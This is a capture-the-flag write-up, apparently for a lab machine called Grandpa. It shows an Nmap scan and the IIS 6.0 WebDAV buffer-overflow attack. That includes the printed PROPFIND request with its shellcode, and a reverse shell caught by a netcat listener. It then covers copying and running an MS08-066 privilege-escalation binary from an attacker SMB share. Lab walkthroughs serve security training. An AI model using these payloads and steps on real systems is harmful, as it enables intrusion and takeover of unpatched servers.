The first step was to run an Nmap scan to discover services running on the machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Nmap 7.80 scan initiated Thu Nov 12 14:33:08 2020 as: nmap -sV -sC -O -p1-2056 -oN scan 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.014s latency).
Not shown: 2055 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Thu, 12 Nov 2020 19:36:15 GMT
|_ Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2008 Enterprise SP2 (91%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2003 SP2 (88%), Microsoft Windows 2000 SP4 (86%), Microsoft Windows XP (86%), Microsoft Windows Server 2003 SP1 - SP2 (85%), Microsoft Windows XP SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 12 14:33:28 2020 -- 1 IP address (1 host up) scanned in 19.20 seconds
From the output we can see that IIS 6.0 is running with webdav. I then used searchsploit to search for exploits for IIS 6.0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[/home/kali]
└─# searchsploit iis 6.0 1 ⨯
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | windows/remote/8765.php
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
After some trials with some exploits searchsploit discovered, I was able to use the one based on the ScStoragePathFromUrl remote buffer overflow found HERE.
I created a netcat listener on port 2600, downloaded the python script and ran it with the necessary arguments.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:/home/kali/Documents/grandpa# python test.py 10.10.10.14 80 10.10.14.15 2600
Traceback (most recent call last):
File "test.py", line 124, in <module>
sock.connect((targetip,targetport))
File "/usr/lib/python2.7/socket.py", line 228, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 110] Connection timed out
root@kali:/home/kali/Documents/grandpa# python test.py 10.10.10.14 80 10.10.14.15 2600
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa₩ᄑᄄᄀᆪンᄀトᄈ₩ᄂᄊ¦ンᄇᄄᄍ¦ᆳᄋ¦ᄑᄚユモᄅマ¦ᄀᄄ¥ルᆪ₩ᄉヤ₩ᄀナ ̄ᆬモ¥チᆲ¥ユᄃ₩ンᆪ ̄ヘᄂ¦リᄚᄀナ₩ᆬメ¥ミᄆ¦ᄆリ₩ᄅムノチ¦ネᄆタᄉ¥ᄀミ ̄ルᄂ₩ᄆヌ ̄ヤᄍ¥ムᆰ¥タᄡ¥ムテンメ¥チᄀ ̄ネᄇ₩ᄉヒ₩ᄚᄡ ̄ノヌ₩ノチ ̄ンヘ¥ナᄀ¥ᄀᄁ¦ンᄈ¥ノミ ̄ルᄚユト₩ᄀᆰ ̄ヘᄡ¦ᄍハᄀᆱ¦ᆬᄊ¦ᄍᄈ¦ᄆᆰ¥ンᄎ₩ᄑᄆ¥ᄀハ ̄ネᄚ ̄ンᆴ¦ᆳノ¥ノヘ¦ᄀᆪ₩ᄑフユヨユᄉ₩ルᆵルᄄ¦ムヘ¥チᄚᄄᄊ₩ノヒ₩ユラユミ₩ᄅᄇᄅᆱンᄁルリ₩ノネ₩ヤᄆ ̄チヤ₩ᄆᄍ¥チハ¥ムᄁ¥タᄈ ̄ユᄋ₩ᄅᄋ¦ナト ̄フᄡ₩ムᄊ¦ᄉニ¥ルヤ¦ンᆲ₩ユテリᄇノᄌ¥ンᄅ¦フᄌ₩ノᄇ¥ᄄᄚ¥ᄂᄌ¥ムネツツ£ヒタ₩ᅠテ₩ᄆト¥ノヨ¦ᆲᄋ₩ᄆᆳ¦ᄑリ¥ᄀレᆬミ¦ᆬᆰ¥ᄀマ¦ᄅメ¦ナミ₩ルヘ£マタ₩ᅠテ¦ᅠᄡ₩ヤᄆ₩ᄑテ₩ᄍᆭムチ¦ヘᆲ£マタ₩ᅠテ¥ヘテ₩ᄅチチメ ̄フᄚ¥ᄀᆭ¦ノフチヒ₩ヘニ¥ナᄈᆬチᄅミ¦ᄅᆲ> (Not <locktoken:write1>) <http://localhost/bbbbbbbᆬネ₩ナᄉ¦ᄑテ₩ᄑᄃ₩ᆳᆵ¦ᄀナ ̄ルニ₩ンᄉ¦ミᄈ ̄ᄀᄆ¥ンᆬ¥ᄅᄁ¥ミᄉ¥ルᄀ₩ᆬメ₩ᄅモ¥ナラ ̄ᄀホ¥ᆬネ₩ヘユ¦ᆬᄆ¦ヘᄂ₩ムᄇ ̄ムᄄ¦ンリナᄍ ̄ヘᆱ₩ᆳユ₩ᄉネ¥チマᄅニ ̄ムᄆ₩ᄑヤムテ¥ᆬヨ₩ᄑᆵヘチ ̄ムラ₩ナᄄᄅᄇ ̄ンナ¦ᄉノ¥ンホ¥ムネ¦ᄚᄌ ̄ルᄎ ̄ユᄇ₩ノᆭ₩ᄍテ¦ᄀᆳ ̄ユネ₩ナᄋ¦ᄉレ₩ナᄡ¦トᄈ¦ヘᆬ¥ノᄇ₩ᄉᄅ ̄ルᄆ¦ᄍᄂ₩ᄌᄍ₩ヘモ₩ᆳᄂ¥ナニ¦ᄐᄚᄀᆵノモ₩ンミ¦ユモᄅᆪトᄍ¦ᄑモ¦ムヨ₩ᄐᄊヘᄍ₩ᄀᄋᄅヨ₩ナハ ̄ᆬナ ̄リᄍ₩ᄚᄍ¦ヤᄆ ̄ムᄇ¥ヘᆬ¥ᄀハ¦ムホᄅト₩ᄚᄉ¥ᄅヨ₩ノチ₩ᄍᄇ₩リᄆ¥ᆬル¥ミᄈ ̄ナツ¥ᄀᆬ¥ᆬチナミ ̄タᄊ¥ンᄋ¦ムラ¥ヘᄀ£マタ₩ᅠテ₩ᄍマ₩ᅠタ₩ᄍマ₩ᅠタ¦ノヌルᆰ£マタ₩ᅠテ¦ノラ¦ᄑᄡ¥ᆬヌ¥ネᄡ¦ᆳᆭ¦ᆳツムᄂᄀᆵ₩ツツ₩ᅠチ¥トᄉノᄎムᄎ¦ᄉヌ¦ムル¥ンラ→トモ₩ᅠタ ̄ナᄊ₩ᄍᆵ¬モᆪ₩ᅠチ£ムᅠ₩ᅠテᄒ£マタ₩ᅠテᆴ₩ᅠテナᆴムᄚ£ミᄡ₩ᅠテ¬ᄃᄃ₩ᅠチ←ホム₩ᅠタ ̄ᄂᄆ₩ルᆴ¦ᆬユ ̄チメ¥ムᆱルᆱノハᆬᄀ£ミワ₩ᅠテ₩ᄌナ₩ᅠタワᄇᆬᄄ¦ᄉᄅ ̄ルᆲ¦ムᄄ¦ᄉᄚ│ノニ₩ᅠタ¦ᄀᄋ ̄ノモ£ᄊᆰ₩ᅠツ₩ᄑᆰ¦フᄉ£マᄌ₩ᅠテ¬ᄃᄃ₩ᅠチVVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>
1
2
3
4
5
6
7
8
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600 1 ⨯
listening on [any] 2600 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
As you can see from the output, the shell was successfully captured by the netcat listener. I then moved onto privilege escalation. I ran systeminfo to get some details of the Grandpa machine. From the output I was able to determine that it was running Server 2003 with only 1 hotfix. Because of this I decided to try using the MS08-066 exploit as I had luck with it in the past. I downloaded the exploit from GITHUB and copied it to the machine using SBM.
1
2
3
C:\wmpub>copy \\10.10.14.18\testshare\ms08066.exe
copy \\10.10.14.18\testshare\ms08066.exe
1 file(s) copied.
I then ran the exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
C:\wmpub>ms08066.exe
ms08066.exe
MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit
Create by SoBeIt.
Kernel is \WINDOWS\system32\ntkrnlpa.exe
Kernel base address: 80800000
Major Version:5 Minor Version:2
Load Base:410000
HalDispatchTable Offset:8088e078
NtQueryIntervalProfile function entry address:8088e07c
Exploit finished.
C:\wmpub>cd c:\
cd c:\
C:\>cd documents and settings
cd documents and settings
C:\Documents and Settings>cd Harry
cd Harry
C:\Documents and Settings\Harry>cd Desktop
cd Desktop
C:\Documents and Settings\Harry\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Harry\Desktop
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:32 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,123,960,320 bytes free
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
[REDACTED]
C:\Documents and Settings\Harry\Desktop>cd ..
cd ..
C:\Documents and Settings\Harry>cd ..
cd ..
C:\Documents and Settings>cd Administrator
cd Administrator
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]
As you can see from the output, I was able to successfully browse to the Administrator and Harry folders as the SYSTEM user and capture both flags.